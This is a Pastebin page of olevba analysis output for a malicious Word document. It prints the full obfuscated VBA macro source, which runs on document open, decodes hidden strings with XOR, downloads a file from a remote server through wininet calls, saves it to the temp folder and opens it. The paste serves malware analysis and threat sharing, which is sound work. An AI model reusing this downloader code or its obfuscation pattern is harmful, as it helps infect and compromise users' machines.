SHARE
TWEET

Malicious Word macro

dynamoo Apr 2nd, 2015 266 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHBD skettd~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: skettd~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: skettd~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. ZasimSimZa
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO BYP6.bas
  27. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BYP6'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Public Function ZasimSimZa()
  31. Dim RikoSHET As Long
  32. RikoSHET = 21
  33. ETU2BUD3EM1 414, 263
  34.  
  35. End Function
  36.  
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. ANALYSIS:
  39. No suspicious keyword or IOC found.
  40. -------------------------------------------------------------------------------
  41. VBA MACRO BAP5.bas
  42. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BAP5'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44.  
  45.  
  46. Public Function NUCHTOGTISTRASHNAYA(Per3vi4y7 As String, Vt4oro8y89 As String) As String
  47.    
  48.     Dim Eto4T6Ne9Kak23VSE0 As Integer
  49.     Dim Eto4T6Ne9Kak23VSE01 As Integer
  50.    
  51.    
  52.     Dim G3eeeS3GE4W As Double
  53.     G3eeeS3GE4W = 44.77
  54.     G3eeeS3GE4W = G3eeeS3GE4W + Abs(G3eeeS3GE4W)
  55.     Dim Eto4T6Ne9Kak23VSE As Long
  56.    
  57.     Dim Pet4rush5ka3 As Double
  58.     Dim Eto4T6Ne9Kak23VSEO As String
  59.    
  60.     Dim SomeDate As Date
  61.     SomeDate = DateAdd("yyyy", 4, "22/11/2003")
  62.    
  63.    
  64.     Pet4rush5ka3 = 0
  65.             For Eto4T6Ne9Kak23VSE = 1 To _
  66.     ( _
  67.     Op8Red7ElyAET3 _
  68.     (Vt4oro8y89) _
  69.     / 2)
  70.     Pet4rush5ka3 = Pet4rush5ka3 + 0.1
  71.         Eto4T6Ne9Kak23VSE0 = Val("&H" & _
  72.         (Mid$(Vt4oro8y89, _
  73.         (2 * Eto4T6Ne9Kak23VSE) - 1, 2)))
  74.         Eto4T6Ne9Kak23VSE01 = Asc(Mid$(Per3vi4y7, _
  75.         ((Eto4T6Ne9Kak23VSE Mod Len(Per3vi4y7)) + 1), 1))
  76.         Eto4T6Ne9Kak23VSEO = Eto4T6Ne9Kak23VSEO + Chr(Eto4T6Ne9Kak23VSE0 Xor Eto4T6Ne9Kak23VSE01)
  77.     Next Eto4T6Ne9Kak23VSE
  78.    NUCHTOGTISTRASHNAYA = Eto4T6Ne9Kak23VSEO
  79.    SomeDate = DateAdd("yyyy", 1, SomeDate)
  80.    
  81. End Function
  82.  
  83.  
  84.  
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. ANALYSIS:
  87. +------------+----------------+-----------------------------------------+
  88. | Type       | Keyword        | Description                             |
  89. +------------+----------------+-----------------------------------------+
  90. | Suspicious | Chr            | May attempt to obfuscate specific       |
  91. |            |                | strings                                 |
  92. | Suspicious | Xor            | May attempt to obfuscate specific       |
  93. |            |                | strings                                 |
  94. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  95. |            |                | may be used to obfuscate strings        |
  96. |            |                | (option --decode to see all)            |
  97. +------------+----------------+-----------------------------------------+
  98. -------------------------------------------------------------------------------
  99. VBA MACRO BEP4.bas
  100. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BEP4'
  101. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  102.  
  103.  
  104. Public Const VEEWWWEE33211 = "601A0D1E5F4672041D5A5E560C415A025B"
  105. Public Const HR553366221 = "6F101D16570D035A5D18055743504B08"
  106. Public Const WREGLEYSPEAR14 = "5B061C0209471C031E0055410A0102001B5B0258561852150D5C47455C1A015F5950435156420501581A075A1D171017"
  107. Public Const WREGLEYSPEAR13 = "60111A1B431C5A1A0A18715C01506014464708587C0A59170B06"
  108. Public Const C2332234325 = "h3rhr3h3tm675m53m53m53"
  109.  
  110.  
  111.  
  112. Public Function RIKAKELLLE2(ByRef SAAARD1 As Object, SomeINCOME As Integer) As Object
  113. Set RIKAKELLLE2 = SAAARD1.GetSpecialFolder(2)
  114. End Function
  115. Public Function ETU2BUD3EM1(RUFRUFRUF As Double, I9PUST5ESHE2 As Integer)
  116.  
  117. AUTO1AUTO2 ("CA_LLS_AAAL_CSL_921_29")
  118. End Function
  119.  
  120.  
  121. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  122. ANALYSIS:
  123. +------------+----------------+-----------------------------------------+
  124. | Type       | Keyword        | Description                             |
  125. +------------+----------------+-----------------------------------------+
  126. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  127. |            |                | be used to obfuscate strings (option    |
  128. |            |                | --decode to see all)                    |
  129. | Suspicious | Dridex Strings | Dridex-encoded strings were detected,   |
  130. |            |                | may be used to obfuscate strings        |
  131. |            |                | (option --decode to see all)            |
  132. +------------+----------------+-----------------------------------------+
  133. -------------------------------------------------------------------------------
  134. VBA MACRO BOP2.bas
  135. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BOP2'
  136. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  137.  
  138. Public Const OOOAOOA12KNEV3 = "KKKALLLLISTO820**02**_____++++"
  139.  
  140.  
  141. Public _
  142. Function AUTO1AUTO2(CEM7HAZ1 _
  143. As _
  144. String)
  145. VHOD1SU1
  146. End Function
  147. Public Function VHOD1SU1()
  148.  
  149. Dim T929929T  As Object
  150. Set T929929T = CreateObject _
  151. (NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR13))
  152.  
  153.  
  154. Dim ADeeee11 As Double
  155.  
  156. ADeeee11 = 2232.5
  157. Dim FAAAAE5WT As Long
  158. FAAAAE5WT = Abs(ADeeee11)
  159.  
  160.  
  161. Dim RUBUBUBUBU2211 As Object
  162. Set RUBUBUBUBU2211 = RIKAKELLLE2(T929929T, 3444)
  163. AD34BF54VC11 = 45.5 + 43
  164. Dim VEEQ332199
  165. ASDFKJF = NUCHTOGTISTRASHNAYA(C2332234325, HR553366221)
  166. VEEQ332199 = RUBUBUBUBU2211 & ASDFKJF
  167. Dim RU8FU7S4 As Integer
  168. FB2R3RWT4E5WT = Abs(AD34BF54VC11 + 12)
  169. Dim HI6M8A9DA0 As Integer
  170.  
  171. HI6M8A9DA0 = FB2R3RWT4E5WT - AD34BF54VC11
  172.  
  173. If BMT74326784(T929929T, VEEQ332199, 1425) Then
  174. T929929T. _
  175. DeleteFile VEEQ332199
  176. End If
  177. If NEGIZNBILA(VEEQ332199) Then
  178. End If
  179. Set SSSS = Nothing
  180. If BMT74326784(T929929T, VEEQ332199, 2561) Then
  181. End If
  182. Set LPOOOO3222333 = CreateObject _
  183. (NUCHTOGTISTRASHNAYA _
  184. (C2332234325, VEEWWWEE33211))
  185. LPOOOO3222333.Open VEEQ332199
  186. End Function
  187.  
  188. Public Sub HHFOOEAKMMANNAN()
  189. '
  190. ' dddd Ìàêðîñ
  191. ' ewh
  192. '
  193.    Selection.TypeText Text:="hhehalkkcl "
  194.     Selection.TypeParagraph
  195.     Selection.TypeText Text:="sdfjjjfsdjkkdkfkk"
  196.     Selection.TypeParagraph
  197.     Selection.TypeText Text:="dskkdsfkkkfkk"
  198.     Selection.TypeParagraph
  199.     Selection.WholeStory
  200.     Selection.Font.Bold = wdToggle
  201.     Selection.Font.Italic = wdToggle
  202.     If Selection.Font.Underline = wdUnderlineNone Then
  203.         Selection.Font.Underline = wdUnderlineSingle
  204.     Else
  205.         Selection.Font.Underline = wdUnderlineNone
  206.     End If
  207.     If Selection.Font.Underline = wdUnderlineNone Then
  208.         Selection.Font.Underline = wdUnderlineSingle
  209.     Else
  210.         Selection.Font.Underline = wdUnderlineNone
  211.     End If
  212.     Selection.Font.Italic = wdToggle
  213.     Selection.Font.Bold = wdToggle
  214.     Selection.Range.HighlightColorIndex = wdYellow
  215.     Options.DefaultHighlightColorIndex = wdBrightGreen
  216.     Selection.Range.HighlightColorIndex = wdBrightGreen
  217.     Options.DefaultHighlightColorIndex = wdTurquoise
  218.     Selection.Range.HighlightColorIndex = wdTurquoise
  219.     Options.DefaultHighlightColorIndex = wdPink
  220.     Selection.Range.HighlightColorIndex = wdPink
  221.     Options.DefaultHighlightColorIndex = wdTeal
  222.     Selection.Range.HighlightColorIndex = wdTeal
  223.     Selection.Font.Color = wdColorDarkTeal
  224.     Selection.Font.Color = wdColorLightOrange
  225.     Selection.Font.Color = wdColorDarkYellow
  226.     Selection.TypeBackspace
  227. End Sub
  228.  
  229. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  230. ANALYSIS:
  231. +------------+--------------+-----------------------------------------+
  232. | Type       | Keyword      | Description                             |
  233. +------------+--------------+-----------------------------------------+
  234. | Suspicious | CreateObject | May create an OLE object                |
  235. | Suspicious | Open         | May open a file                         |
  236. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  237. |            |              | be used to obfuscate strings (option    |
  238. |            |              | --decode to see all)                    |
  239. +------------+--------------+-----------------------------------------+
  240. -------------------------------------------------------------------------------
  241. VBA MACRO BUP3.bas
  242. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BUP3'
  243. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  244.  
  245. #If VBA7 And Win64 Then
  246. Public Declare PtrSafe Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  247. Public Declare PtrSafe Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  248. Public Declare PtrSafe Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As LongPtr, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  249. Public Declare PtrSafe Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  250. #Else
  251. Public Declare Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  252. Public Declare Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  253. Public Declare Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As Long, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  254. Public Declare Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  255. #End If
  256.  
  257. Public Function Op8Red7ElyAET3(AS1AeW2W3WW As String) As Integer
  258. Op8Red7ElyAET3 = Len(AS1AeW2W3WW)
  259. End Function
  260.  
  261.  
  262.  
  263. #If VBA7 _
  264.     And Win64 Then
  265.        Public Function SomeFunct4(ByRef RUKALICO87 As LongPtr, HLOPUSHKA6 As LongPtr, Hernya As String) As Boolean
  266.     #Else
  267.        Public Function SomeFunct4(ByRef RUKALICO87 As Long, HLOPUSHKA6 As Long, Hernya As String) As Boolean
  268.     #End If
  269. Dim URLPURL1 As String
  270.     URLPURL1 = NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR14)
  271.    
  272.                 RUKALICO87 _
  273.     = ho7Ro8Vo5D1 _
  274.     ( _
  275.     HLOPUSHKA6, _
  276.     URLPURL1, vbNullString, _
  277.     0, _
  278.     etoeshekto2, 0)
  279.     SomeFunct4 = True
  280. End Function
  281.  
  282.  
  283. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  284. ANALYSIS:
  285. +------------+----------------+-----------------------------------------+
  286. | Type       | Keyword        | Description                             |
  287. +------------+----------------+-----------------------------------------+
  288. | Suspicious | Lib            | May run code from a DLL                 |
  289. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  290. |            |                | be used to obfuscate strings (option    |
  291. |            |                | --decode to see all)                    |
  292. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  293. |            |                | may be used to obfuscate strings        |
  294. |            |                | (option --decode to see all)            |
  295. | IOC        | wininet.dll    | Executable file name                    |
  296. +------------+----------------+-----------------------------------------+
  297. -------------------------------------------------------------------------------
  298. VBA MACRO BIP1.bas
  299. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BIP1'
  300. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  301. Option Explicit
  302.  
  303.  
  304. Private Const NENAKRASHENNAYA872 = 8162
  305. Private Const NENAKRASHENNAYA871 As String = "Nu Pust Budet tak"
  306. Private Const NENAKRASHENNAYA999 = 1
  307. Private Const etoeshekto2 = &H4000000
  308.  
  309. Public Function NEGIZNBILA _
  310. (ByVal PESNYABI As String) As Boolean
  311.     #If VBA7 _
  312.     And Win64 Then
  313.         Dim VMESTO2 As LongPtr, YABIL2 As LongPtr
  314.     #Else
  315.         Dim VMESTO2 As Long, YABIL2 As Long
  316.     #End If
  317.     Dim ETOTYAZABILDAVNO As Long
  318.     Dim REKOMDEDEBET1 As String * NENAKRASHENNAYA872, POKORO4E As String
  319.     Dim SISKAPIR721 As Integer, DLINIYPAREN As Double
  320.     VMESTO2 = Reb6ya7ta9(NENAKRASHENNAYA871, NENAKRASHENNAYA999, vbNullString, vbNullString, 0)
  321.     If VMESTO2 = 0 Then
  322.         Exit Function
  323.     End If
  324.     Dim FiGaMan As Boolean
  325.    
  326.     If SomeFunct4(YABIL2, VMESTO2, "Popkorn") Then
  327.     End If
  328.     If YABIL2 = 0 Then
  329.         DLINIYPAREN = 0
  330.     Else
  331.         Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
  332.         POKORO4E = REKOMDEDEBET1
  333.         Do While ETOTYAZABILDAVNO <> 0
  334.             Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
  335.            
  336.             Dim BEE999999332 As Long
  337. For BEE999999332 = 14 To 18
  338. If BEE999999332 = 38 Then End
  339. Next BEE999999332
  340.            
  341.             POKORO4E = POKORO4E + Mid(REKOMDEDEBET1, 1, ETOTYAZABILDAVNO)
  342.         Loop
  343.             DLINIYPAREN = Len(POKORO4E): SISKAPIR721 = FreeFile
  344.         Open PESNYABI _
  345.             For Binary Access Write _
  346.         Lock Write _
  347.         As #SISKAPIR721
  348.         Put #SISKAPIR721, _
  349.                 , POKORO4E
  350.         Dim HH457457547LLLL As Double
  351.             For HH457457547LLLL = 2 To 3
  352.     If HH457457547LLLL = 37 Then End
  353.                     Next HH457457547LLLL
  354.         Close #SISKAPIR721
  355.     End If
  356.     Kud2at3o YABIL2
  357.     Kud2at3o VMESTO2
  358.     POKORO4E = ""
  359.     If DLINIYPAREN Then
  360.         NEGIZNBILA = True
  361.     End If
  362. End Function
  363.  
  364. Public Function BMT74326784(ByRef PLO9 As Object, ByVal ASXXX3 As String, Ribka As Integer) As Boolean
  365. If PLO9.FileExists(ASXXX3) Then
  366. BMT74326784 = True
  367. Else
  368. BMT74326784 = False
  369. End If
  370. End Function
  371.  
  372. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  373. ANALYSIS:
  374. +------------+-------------+-----------------------------------------+
  375. | Type       | Keyword     | Description                             |
  376. +------------+-------------+-----------------------------------------+
  377. | Suspicious | Open        | May open a file                         |
  378. | Suspicious | Write       | May write to a file (if combined with   |
  379. |            |             | Open)                                   |
  380. | Suspicious | Put         | May write to a file (if combined with   |
  381. |            |             | Open)                                   |
  382. | Suspicious | Binary      | May read or write a binary file (if     |
  383. |            |             | combined with Open)                     |
  384. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  385. |            |             | be used to obfuscate strings (option    |
  386. |            |             | --decode to see all)                    |
  387. +------------+-------------+-----------------------------------------+
  388. -------------------------------------------------------------------------------
  389. VBA MACRO UserForm1.frm
  390. in file: skettd~1.doc - OLE stream: u'Macros/VBA/UserForm1'
  391. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  392. (empty macro)
RAW Paste Data
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top